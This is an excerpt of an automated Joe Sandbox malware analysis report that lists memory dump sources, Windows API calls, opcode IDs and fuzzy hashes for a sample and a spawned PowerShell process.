                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                          • API String ID: 3509786178-2769509956
                                                                                          • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                          • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                          • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                          • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                          APIs
                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                          • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2144169618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2144154096.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144185918.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144200539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.2144310639.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_eMBO6wS1b5.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 190613189-0
                                                                                          • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                          • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                          • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                          • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2839929833.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_7490000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ce028983fd7e2aba6cf8d55c8ccfd1214b1a62be6e51ab6f4755401e06f2beb
                                                                                          • Instruction ID: 6870f6dc4471e8c8389342de64290f9f212131dd8d04e80a886bb64c72655dde
                                                                                          • Opcode Fuzzy Hash: 7ce028983fd7e2aba6cf8d55c8ccfd1214b1a62be6e51ab6f4755401e06f2beb
                                                                                          • Instruction Fuzzy Hash: 171268B1B0434ADFDF158B688801BABBFA2AFC5215F1480BBD645CB791DB71C942C7A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834511521.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2ca0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3ba5f21a6487e345cd2290a62bd07be1f52cfec390d26b4ac5512494ddaaa98a
                                                                                          • Instruction ID: 08e2d3933555314ccaed3199f01910fb000d0264e29d855a7c571faab7db0f18
                                                                                          • Opcode Fuzzy Hash: 3ba5f21a6487e345cd2290a62bd07be1f52cfec390d26b4ac5512494ddaaa98a
                                                                                          • Instruction Fuzzy Hash: 7E91AE74A00606CFCB15CF58C5A4AAEFBB1FF88314B248699D916AB361C735FC51CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2839929833.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_7490000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e829c95e50c43596a167665641ac66a57f8431a78b7689ac92dfa38895c9bed
                                                                                          • Instruction ID: 3accda884fc3ace5d480a3f28b876b6defb84825dbf7aac7ac724f8292e59ec8
                                                                                          • Opcode Fuzzy Hash: 0e829c95e50c43596a167665641ac66a57f8431a78b7689ac92dfa38895c9bed
                                                                                          • Instruction Fuzzy Hash: 884100F4A0830BCFCF158B248440ABABFA2AF86254F1985BBD4449F792D731DA41C762
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834511521.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2ca0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 054f93c879ec394d83bdec948d02090121d5e58bdafe2a7a6e1a1dd5f51209ff
                                                                                          • Instruction ID: 56230543fcddb6abfc2d134e6b361055d356605bd72f7a728012d2d771f70eb2
                                                                                          • Opcode Fuzzy Hash: 054f93c879ec394d83bdec948d02090121d5e58bdafe2a7a6e1a1dd5f51209ff
                                                                                          • Instruction Fuzzy Hash: E7414B74A01516CFCB05CF59C5A8AAEFBB1FF48318B118159C916AB364C731FD51CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834511521.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2ca0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 138b365bebae36ee0093920489f966e10da5fa3b43cd78b0667aef64cd10cd8d
                                                                                          • Instruction ID: f410e95ae267e8714b35e7ea3eebe92b7d147671731df407eb8d1df96af51832
                                                                                          • Opcode Fuzzy Hash: 138b365bebae36ee0093920489f966e10da5fa3b43cd78b0667aef64cd10cd8d
                                                                                          • Instruction Fuzzy Hash: 2D214A74A046499FCB05CB98D8809AEBBF1FF89314B158199D809AB352C371ED46CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834511521.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2ca0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e3b051700e1cf98d7d6a2eaf94222f3e54bbdbbe1e4015886652494e412dc64
                                                                                          • Instruction ID: 11850326f23f306b5aad31d060d76a7b4f5d6e1fccacf8ec79134fd20660d2ff
                                                                                          • Opcode Fuzzy Hash: 0e3b051700e1cf98d7d6a2eaf94222f3e54bbdbbe1e4015886652494e412dc64
                                                                                          • Instruction Fuzzy Hash: 53116D74A00609CFCB05CBA8C490AADFBF2FF89304B15809AD409AB362C731FC42CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834149728.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2bbd000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e24cefb3726b3dfc954945d59bd74c26d027337c9284ac8a5757df8709e16ca
                                                                                          • Instruction ID: 0eb9bb4e200e487fc69574abafe47882a04d03e101f3e2b8c00ceedc135154d4
                                                                                          • Opcode Fuzzy Hash: 0e24cefb3726b3dfc954945d59bd74c26d027337c9284ac8a5757df8709e16ca
                                                                                          • Instruction Fuzzy Hash: AB01F2725053419BE7128A25CD80BB6BF98EF41324F48C09AEE084A242C7FD9841CAB1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834511521.0000000002CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2ca0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73731c5985c3a2237790a7553c267638b3380e131179358ad8f12534a77d38ec
                                                                                          • Instruction ID: 6a8bf0081ae85dae05d130b924b04bb4fb483e6cc076bab19c901a9553dc37b6
                                                                                          • Opcode Fuzzy Hash: 73731c5985c3a2237790a7553c267638b3380e131179358ad8f12534a77d38ec
                                                                                          • Instruction Fuzzy Hash: E301D474F05645CFCB05CBACD8A06ADBBB2FF89304B188096C409AB362C775AC46CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2834149728.0000000002BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_2bbd000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2692ddbdbb5e23c629b917ed3cc0336860365dffb43d293d5b3d7e0ed4adef81
                                                                                          • Instruction ID: 7c0b7488185cfd49996a81d80f3b625c1635275fb5dbd18b795b97839b3ce0c2
                                                                                          • Opcode Fuzzy Hash: 2692ddbdbb5e23c629b917ed3cc0336860365dffb43d293d5b3d7e0ed4adef81
                                                                                          • Instruction Fuzzy Hash: C401526250E3C05FD7138B258D94762BFA4DF52224F1980DBD9888F193C2695844C772
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000001C.00000002.2839929833.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_28_2_7490000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 7l$7l$7l$7l
                                                                                          • API String ID: 0-1881692460
                                                                                          • Opcode ID: 6703f382ce0af3f68212d3f98f6cac8084742f694d12b651533e4df309acaa54
                                                                                          • Instruction ID: 25caac8c02175c694d632eb2f3851e9ecb823750c6e4381d486e99f7afb192af
                                                                                          • Opcode Fuzzy Hash: 6703f382ce0af3f68212d3f98f6cac8084742f694d12b651533e4df309acaa54
                                                                                          • Instruction Fuzzy Hash: 11F106B5B0421ACFDB258B689401AEBBFE2AFC5211F1884BBD545CB751DB31CD42CBA1